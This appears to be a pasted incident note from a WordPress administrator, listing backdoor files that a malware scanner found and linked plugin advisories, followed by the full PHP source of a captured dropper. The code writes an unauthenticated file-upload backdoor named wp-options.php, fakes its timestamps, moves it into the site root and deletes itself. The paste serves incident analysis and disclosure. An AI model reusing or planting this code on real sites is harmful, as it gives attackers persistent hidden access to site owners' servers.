SHOW:
|
|
- or go back to the newest paste.
1 | /* Found suspicious backdoor that modifies wp-options.php in wp-admin directory, moves it to WordPress root, then removes itself. Placed by an unknown backdoor and sits silently for a request directly to frommhead.php. | |
2 | ||
3 | Possible backdoors may be cmdshell files, maldet found these files in production: | |
4 | wp-includes/js/thickbox/rvbt28.php | |
5 | wp-includes/class-wp-xmlrpc.php | |
6 | wp-content/themes/agentpress/mtgh.php | |
7 | ||
8 | Backdoors may have been placed by one or more vulnerabilities. A couple to note that were found in production but not 100% certain which exploit was used: | |
9 | http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html | |
10 | http://blog.sucuri.net/2014/12/revslider-vulnerability-leads-to-massive-wordpress-soaksoak-compromise.html | |
11 | ||
12 | One backdoor has placed eval(base64_decode) in the footer.php of all directories /themes/ and leaves a comment stating it's wp cache code. May be unrelated to frommshead.php but could have used one of the backdoors listed above. | |
13 | ||
14 | Still seeking possible backdoors that have evaded maldet. | |
15 | */ | |
16 | ||
17 | <?php | |
18 | ||
19 | $DEBUG_MODE=false; | |
20 | ||
21 | // Creating wp-admin/wp-options.php (uploader) | |
22 | ||
23 | $file_data_head ="<?php | |
24 | if(isset(#_POST['Submit'])){ | |
25 | #filedir = ''; | |
26 | #maxfile = '2888888'; | |
27 | ||
28 | #userfile_name = #_FILES['image']['name']; | |
29 | #userfile_tmp = #_FILES['image']['tmp_name']; | |
30 | if (isset(#_FILES['image']['name'])) { | |
31 | #abod = #filedir.#userfile_name; | |
32 | @move_uploaded_file(#userfile_tmp, #abod); | |
33 | ||
34 | } | |
35 | } | |
36 | else{ | |
37 | echo'<form method=\"POST\" action=\"\" enctype=\"multipart/form-data\"><input type=\"file\" name=\"image\"><input type=\"Submit\" name=\"Submit\" value=\"Submit\"></form>'; | |
38 | } | |
39 | ?>"; | |
40 | ||
41 | echo"<br>---------------------------- Create wp-admin/wp-options.php (uploader) ---------------------------------<br><br>"; | |
42 | if (file_put_contents("wp-optionstmp.php", str_replace("#", "$", $file_data_head))) { | |
43 | touch("wp-optionstmp.php", mktime(12, 17, 11, 12, 31, 2013)); | |
44 | echo"Proceeded: ".$start."/wp-admin/wp-options.php > Succesfull<br>"; | |
45 | } else { | |
46 | echo"Proceeded: ".$start."/wp-admin/wp-options.php > Error!<br>"; | |
47 | } | |
48 | ||
49 | $file = 'wp-optionstmp.php'; | |
50 | $newfile = '../wp-options.php'; | |
51 | ||
52 | echo"<br>---------------------------- Move wp-admin/wp-options.php > To root folder ---------------------------------<br><br>"; | |
53 | if (rename($file,$newfile)) { | |
54 | touch("../wp-options.php", mktime(12, 17, 11, 12, 31, 2013)); | |
55 | echo"Proceeded: ".$start."/wp-options.php > Succesfull<br>"; | |
56 | } else { | |
57 | echo"Proceeded: ".$start."/wp-options.php > Error!<br>"; | |
58 | } | |
59 | ||
60 | $file='frommshead.php'; | |
61 | ||
62 | echo"<br>---------------------------- Remove frommshead.php (Remove files) ---------------------------------<br><br>"; | |
63 | touch("frommshead.php", mktime(12, 17, 11, 12, 31, 2013)); | |
64 | unlink($file); |